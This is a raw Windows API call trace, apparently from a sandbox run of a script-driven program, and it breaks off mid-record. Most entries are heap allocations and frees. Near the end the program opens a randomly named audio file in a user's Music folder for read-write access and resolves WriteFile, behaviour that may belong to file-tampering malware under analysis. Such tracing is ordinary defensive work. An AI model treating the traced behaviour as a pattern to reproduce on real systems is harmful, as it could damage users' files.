HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0181.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0181.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0181.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0181.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0181.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0181.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0181.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0181.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0181.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0181.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0181.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0181.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0181.576] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0181.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0181.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0181.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0181.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0181.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0181.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0181.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0181.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0181.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0181.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0181.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba540 [0181.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0181.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1b0 [0181.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7c8 [0181.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd948 [0181.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f70 [0181.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0181.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda80 [0181.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba270 [0181.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0181.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd618 [0181.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0181.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0181.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba288 [0181.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0181.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0181.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0181.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0181.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0181.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0181.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0181.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0181.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0181.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0181.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0181.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0181.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0181.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0181.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0181.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0181.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0181.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0181.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0181.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0181.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0181.579] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0181.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0181.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0181.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0181.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0181.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0181.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0181.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0181.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0181.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0181.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.579] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0181.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0181.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0181.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0181.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0181.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0181.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0181.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0181.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0181.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0181.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.580] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0181.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0181.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0181.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0181.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0181.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0181.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0181.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0181.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0181.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.581] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.581] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.581] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.581] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.581] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0181.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0181.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.581] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0181.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0181.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.581] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0181.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0181.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.582] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0181.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0181.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.582] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0181.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0181.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0181.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0181.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0181.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.582] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0181.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0181.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0181.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0181.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0181.582] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0181.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0181.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0181.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0181.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7e0 [0181.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd7e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0181.584] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aduuj\\9zmv2.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0181.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0181.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0181.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0181.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0181.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0181.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0181.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0181.585] FreeLibrary (hLibModule=0x75990000) returned 1 [0181.585] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0181.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0181.585] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0181.585] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0181.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0181.585] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0181.585] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0181.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0181.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0181.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0181.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0181.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0181.586] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0181.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0181.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0181.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0181.586] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0181.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0181.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0181.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0181.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9b9fb8 [0181.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9b9fb8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0181.587] FreeLibrary (hLibModule=0x75990000) returned 1 [0181.588] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0181.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0181.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0181.588] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.588] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.588] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.588] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0181.588] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.588] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.588] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0181.589] FreeLibrary (hLibModule=0x75990000) returned 1 [0181.589] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.589] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.589] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.589] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a", lpFilePart=0x0) returned 0x4d [0181.590] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xece70390, ftCreationTime.dwHighDateTime=0x1d5dda6, 